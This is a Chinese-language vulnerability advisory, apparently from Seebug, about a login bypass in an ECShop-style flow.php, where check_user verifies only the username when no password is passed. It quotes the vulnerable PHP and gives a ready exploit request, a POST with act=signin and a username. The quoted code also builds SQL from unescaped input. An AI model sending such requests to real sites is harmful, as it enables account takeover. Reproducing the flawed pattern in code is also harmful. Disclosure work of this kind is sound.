<p>影响文件:flow.php 188行开始<br></p><pre class="">elseif ($_REQUEST['step'] == 'login') { include_once('languages/'. $_CFG['lang']. '/user.php'); /* * 用户登录注册 */ if ($_SERVER['REQUEST_METHOD'] == 'GET') ..... else { include_once('includes/lib_passport.php'); if (!empty($_POST['act']) && $_POST['act'] == 'signin') { $captcha = intval($_CFG['captcha']); if (($captcha & CAPTCHA_LOGIN) && (!($captcha & CAPTCHA_LOGIN_FAIL) || (($captcha & CAPTCHA_LOGIN_FAIL) && $_ SESSION['login_fail'] > 2)) && gd_version() > 0) { if (empty($_POST['captcha'])) { show_message($_LANG['invalid_captcha']); } /* 检查验证码 */ include_once('includes/cls_captcha.php'); $validator = new captcha(); $validator->session_word = 'captcha_login'; if (!$validator->check_word($_POST['captcha'])) { show_message($_LANG['invalid_captcha']); } } if ($user->login($_POST['username'], $_POST['password'],isset($_POST['remember']))) { ..... }...
<p>影响文件:flow.php 188行开始<br></p><pre class="">elseif ($_REQUEST['step'] == 'login') { include_once('languages/'. $_CFG['lang']. '/user.php'); /* * 用户登录注册 */ if ($_SERVER['REQUEST_METHOD'] == 'GET') ..... else { include_once('includes/lib_passport.php'); if (!empty($_POST['act']) && $_POST['act'] == 'signin') { $captcha = intval($_CFG['captcha']); if (($captcha & CAPTCHA_LOGIN) && (!($captcha & CAPTCHA_LOGIN_FAIL) || (($captcha & CAPTCHA_LOGIN_FAIL) && $_ SESSION['login_fail'] > 2)) && gd_version() > 0) { if (empty($_POST['captcha'])) { show_message($_LANG['invalid_captcha']); } /* 检查验证码 */ include_once('includes/cls_captcha.php'); $validator = new captcha(); $validator->session_word = 'captcha_login'; if (!$validator->check_word($_POST['captcha'])) { show_message($_LANG['invalid_captcha']); } } if ($user->login($_POST['username'], $_POST['password'],isset($_POST['remember']))) { ..... } </pre><p>上面代码中执行了 登录操作 $user>login($_POST['username'], $_POST['password'],isset($_POST['remember'])</p><p>login方法如下:</p><pre class="">function login($username, $password, $remember = null) { if ($this->check_user($username, $password) > 0) { if ($this->need_sync) { $this->sync($username,$password); } $this->set_session($username); $this->set_cookie($username, $remember); return true; } else { return false; } } function check_user($username, $password = null) { $post_username = $username; /* 如果没有定义密码则只检查用户名 */ if ($password === null) { $sql = "SELECT " . $this->field_id . " FROM " . $this->table($this->user_table). " WHERE " . $this->field_name . "='" . $post_username . "'"; return $this->db->getOne($sql); } else { $sql = "SELECT " . $this->field_id . " FROM " . $this->table($this->user_table). " WHERE " . $this->field_name . "='" . $post_username . "' AND " . $this->field_pass . " ='" . $this-> compile_password(array('password'=>$password)) . "'"; return $this->db->getOne($sql); } } <br></pre><p>登录操作最终执行check_user方法,当用户密码为null时,只判断用户名。而在flow.php中并没有对密码进行判断或者初始化。可以只通过账号就可</p><p>以实现登录。</p><p><br></p><p>漏洞利用过程</p><p>url:.xxx.com/flow.php?step=login </p><p>POST:act=signin&username=xxxx&captcha=yyyyy</p><p>captcha是验证码,有时候是不需要验证码的</p><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434684326596-1.png" data-image-size="865,478"><br></p>
